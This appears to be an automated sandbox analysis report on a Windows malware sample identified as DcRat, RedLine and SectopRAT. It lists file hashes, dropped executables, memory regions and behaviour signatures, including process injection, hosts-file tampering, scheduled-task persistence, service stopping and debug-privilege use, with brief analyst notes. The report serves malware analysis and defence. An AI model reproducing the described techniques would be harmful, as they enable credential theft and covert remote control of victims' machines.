SHA256 e58f2652ec82227d6ecacc733adb6e9812fcb39283ef87aba2be65326851e50e
SHA512 3018cbc23b59527b0fe54fc17f13735dddf2e91ac188afb7abdb6fc932e2a965d725b0ffaa8b03fcc7c9f4fbd9f1ba3aafde6a2e3fe1112ccbe42fca44be01ae

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O1G5TO0HNJDRB4GSQX5L.temp

MD5 ec6743559327181472bf050aff1ee453
SHA1 843b1d4821324787df452a6e843c36701f5e3e9a
SHA256 2eacccc0f785d588152e85abb018151eee38149a6920aec322b638777910a999
SHA512 571f4b6275e11ab15052e9bd853aecc093c00a1cc5e947e1cc968f3542cd2377ee6782c6cfc875154b843acbe9bbad5a83fd2fa10d21acc12bcdc18d606ed9ba

C:\Users\Admin\AppData\Local\Temp\explorer.exe

MD5 19eab19c0d0a0b062c8eb85a94a79cc6
SHA1 3f0e2e88b9ff61e2e56edc473861cc4373af525a
SHA256 02eb6c61b19d347b9b6846285991142bb0d7515401f8fc4cf7f961be72a3c215
SHA512 550b2aa4b1892643f4a06d9df302f5685e9275ca9b302b8467fd35af806add36fe6ba6202488ea6209ee1b4a79f638d5f6e729bcf4a1b73fd38c4d4570b28223

C:\Users\Admin\AppData\Local\Temp\windowshost.exe

MD5 51ab765a1b1f884f936db4ffc642d728
SHA1 7b7741bf5dfeaed3860bf308733490017688fa46
SHA256 816835537df73c3297cb1a0ddfe02d8f051f0fd9486ee2b1e53969b37fa87f14
SHA512 e25fdd4a7f4fd8bfe9491ec8138ed08077c2c2cd63686e6e4a59859e27294cc35d0ff99ff0b29ae3c2901c6f99e970f6d8e80435d86811398fdb41cf1bbb5234

memory/2852-31-0x0000000000C20000-0x0000000000C3E000-memory.dmp

C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat

MD5 61b88edb5f6dca914ee05650653d8223
SHA1 4b61f3f21e8c981aaa73e375d090de82be46720d
SHA256 eba6d05af3adbcc9a111fe968c3a2c725221f8f7896df3490bc2509bec01cf12
SHA512 1eea3fe2ca12c0d9bc3f9a7a13a1438cdd25e35607232025477af885db7987f6cd4d03613e6be0f6c8457e9db3eaf9b394f62ed14dffa4fbb36c1c07d8e5e7b5

\driverPerf\cominto.exe

MD5 4344aa160852993fab07ae5793321886
SHA1 d33a04a9f58d6172bfaa611ceeb03b24b7c5bee5
SHA256 bbbebdfec732e0805dc3865cfa2f546120e7300d8d6d98ba71ca85026375add4
SHA512 557c569a182284d43db1342aaa64b61acae4665548fa2a7c63af05d45ae1058d070f536c6c80a859e54a051177d21cc21c86b3de4cb03d1d63c993495067d2c0

memory/1804-42-0x0000000001060000-0x00000000012EE000-memory.dmp

memory/1804-43-0x00000000002C0000-0x00000000002CE000-memory.dmp

memory/2868-44-0x0000000000130000-0x0000000000351000-memory.dmp

memory/2608-46-0x000000001B550000-0x000000001B772000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2376-52-0x000000001B540000-0x000000001B822000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e72f38579406c8bfc1e4c8b4c497bcce
SHA1 39ced7de061cd0aaf19948e95c540ad3391cfbf5
SHA256 b26699316a46e99ce6590b4d3fcd41275118254590174e778e3bbb207dd1b222
SHA512 cfeb6399d671e398d9824a058b21ff9111f4e517afdd7f7be50cdae3a4cbbbb96d7a5c7763847573a7742ee1d2fd341aaa22ec7cc260d5b1373e050414ca6d28

memory/2376-53-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

memory/2608-60-0x0000000001FE0000-0x0000000001FE6000-memory.dmp

memory/2556-75-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-73-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-71-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-67-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-65-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-63-0x0000000140000000-0x0000000140057000-memory.dmp

C:\Windows\Tasks\dialersvc32.job

MD5 a29bfde7485c18bab1d5aaf31a7b7453
SHA1 8bd58665e33d49dbd9d814471031b7cbb8ef8f2d
SHA256 88289cee5a06a047d472c20607921a2ceec0ed434e9962802f498816bcf55c4b
SHA512 f78a0755f69fa0fd13c9cb07327b9c7a7af97eba203b38cd20a98f53b86e2cd09b7058b7e3e0d8b7a7f7f8401415b58a08fd1d9bb4b9fcd43ad6133154d72714

memory/784-99-0x0000000140000000-0x0000000140057000-memory.dmp

memory/784-97-0x000007FFFFFD7000-0x000007FFFFFD8000-memory.dmp

memory/2556-69-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-61-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-78-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-77-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

C:\Windows\Tasks\dialersvc64.job

MD5 ba3d478d76a03b6cae4dd27c3aed71e5
SHA1 14ebf1aee1163116150410cb2ce1b966f590b60e
SHA256 49ff5c6df4d05e7148a1fe6b133e261ed9f9fe96068226c392f5cbb14aebfaa5
SHA512 ccc62a5cb21d45e359ea1c4be9729bbbdb4ae2e8ffd4270795db26eacee005162a7f68e340055672afd1c25433a4885cd31abcef40f0765f50f187cef7121bd1

memory/3012-123-0x00000000022D0000-0x00000000022D8000-memory.dmp

memory/3012-122-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 25e23e93f073fd8006c31578c6541ace
SHA1 4eb06835f9e4fb2c2eeda279d9bbdb777542c0e1
SHA256 814d01a00d408bd0fbe158e9d1ab87b5a175ce5bcbcd17fb91d2d9e7fd836fee
SHA512 1bd6cd3064d43bab429ad2d51ade125217bf24786c79492afb7c707bdda521f4dab4a0cec2678eb411e3ae86309011a576a59767ad64129523b42cd54b558b69

memory/1780-130-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1780-138-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1780-142-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1780-141-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1780-140-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

memory/1780-136-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1780-134-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1780-132-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1792-159-0x0000000001C50000-0x0000000001C56000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-06 11:06

Reported

2024-11-06 11:09

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

148s

Command Line

winlogon.exe

Signatures

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Disables service(s)

evasion execution

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2500 created 616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\windowshost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4308 set thread context of 4808 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
PID 4340 set thread context of 836 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
PID 2500 set thread context of 4668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4168 set thread context of 2492 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
PID 1288 set thread context of 2500 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A (58 identical rows, one per sc.exe launch)

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Caveat: opening HKLM\SYSTEM\ControlSet001\Control\NLS\Language is ordinary locale initialisation and benign software does it too, so this signature is low-fidelity on its own. What the table is useful for is the inventory it gives of every process that ran in the sample's context: the sample itself, the dropped windowshost.exe and explorer.exe in the user's Temp directory, and the cmd.exe, WScript.exe and powershell.exe hosts they spawned.

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\windowshost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies data under HKEY_USERS

Reading note: \REGISTRY\USER\.DEFAULT is the profile hive of the LocalSystem account, so the powershell.EXE rows (both the System32 and the SysWOW64 host) show PowerShell running as SYSTEM. The SystemCertificates and WinTrust keys it creates are the empty per-profile certificate-store skeleton that CryptoAPI lays down the first time a process in that profile opens the user certificate stores, which Authenticode and TLS checks both do; they reveal the context PowerShell ran in, not what the script did. The OfficeClickToRun.exe telemetry keys (nexusrules.officeapps.live.com) and the svchost.exe Internet Settings key are writes by Windows and Office components of the sandbox image, not by the sample.

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={1CEB11FC-AAA2-4D46-AC7F-70CB91DA5A1F}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1730891285" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\windowshost.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A (6 identical rows)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (6 identical rows)
N/A N/A C:\Windows\System32\conhost.exe N/A (4 identical rows)
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A (3 identical rows)
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A (42 identical rows)

Suspicious use of AdjustPrivilegeToken

The rows worth attention are the SeDebugPrivilege enablements by the dropped binaries C:\Users\Admin\AppData\Local\Temp\explorer.exe and C:\driverPerf\cominto.exe, and by C:\Windows\System32\conhost.exe, which as the genuine console host has no reason to enable a privilege whose purpose is opening other processes. The SeShutdownPrivilege/SeCreatePagefilePrivilege pairs from powercfg.exe, dwm.exe and Explorer.EXE are what those binaries enable on every run and carry no signal on their own; for powercfg.exe the finding is that it ran, not which privileges it took.

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\driverPerf\cominto.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
